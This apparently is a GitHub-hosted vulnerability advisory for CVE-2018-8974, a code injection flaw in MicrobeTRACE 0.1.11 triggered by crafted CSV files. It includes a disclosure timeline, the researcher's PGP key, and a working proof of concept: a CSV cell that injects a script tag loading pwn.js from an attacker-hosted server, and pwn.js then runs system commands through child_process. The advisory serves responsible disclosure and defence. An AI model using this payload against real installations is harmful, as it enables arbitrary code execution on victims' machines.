Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Description

MicrobeTRACE 0.1.11 allows remote attackers to execute arbitrary code, related to code injection via specially crafted CSV files.

VulnerabilityType

Inclusion of Functionality from Untrusted Control Sphere (CWE-829)

Vendor of Product

Centers for Disease Control and Prevention Surveillance Strategy (CDCgov)

Affected Product Code Base

MicrobeTRACE 0.1.11

Affected Component

Component Version Hash
MicrobeTRACE.exe 0.1.11 997e33089165286a364dc543174dc232

Attack Type

Remote

Impact Code execution

true

Attack Vectors

Attackers can exploit this vulnerability by creating a specially crafted CSV file that subsequently injects and executes server side code.

Reference

Product Website
Product Download

Discoverer

West Shepherd
wshepherd0010[at]gmail.com

Advisory ID

CVE-2018-8974

Report Timeline

Date Action
3/23/2018 Discovered vulnerability, contacted vendor, requested CVE.
3/23/2018 Vendor replied, working on fix.
3/27/2018 Vendor published fix for 0.1.11.
4/24/2018 Released details to public.

PoC

/*
# Exploit Title: MicrobeTRACE 0.1.11 - Code Injection
# Google Dork: N/A
# Date: 4/24/2018
# Exploit Author: West Shepherd
# Vendor Homepage: https://github.com/CDCgov/MicrobeTRACE
# Software Link: https://github.com/CDCgov/MicrobeTRACE/releases/tag/v0.1.11
# Version: 0.1.11
# Tested on: Windows 7 x86-x64
# CVE : CVE-2018-8974.
*/

/* 
Steps to reproduce: 
1.) create pwn.js
2.) create exploit.csv
3.) run "python -m SimpleHTTPServer 80"
4.) load exploit.csv with MicrobeTRACE
*/

// contents of pwn.js
const exec = require('child_process').exec;

function os_func() {
    this.execCommand = function(cmd, callback) {
        exec(cmd, (error, stdout, stderr) => {
            if (error) {
                alert('exec error:' + error);
                return;
            }

            callback(stdout);
        });
    }
}

var os = new os_func();
os.execCommand('whoami', function (returnvalue) {    
    alert(returnvalue + ' has been pwned.');
});

// contents of exploit.csv (for 0.1.11)
/*
Source<script type="text/javascript" src="http://172.26.61.131/pwn.js"></script>,Target,Weight,distance
1807,1311,1,0.013987
1518,1311,15,0.013985
1481,1311,26,0.01398
1480,1311,12,0.01398
1422,1311,24,0.013978
*/

PGP

Contact West Shepherd wshepherd0010[at]gmail.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: CryptUp 4.4.6 Gmail Encryption https://cryptup.org
Comment: Seamlessly send, receive and search encrypted email

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
6/I9
=vCq5
-----END PGP PUBLIC KEY BLOCK-----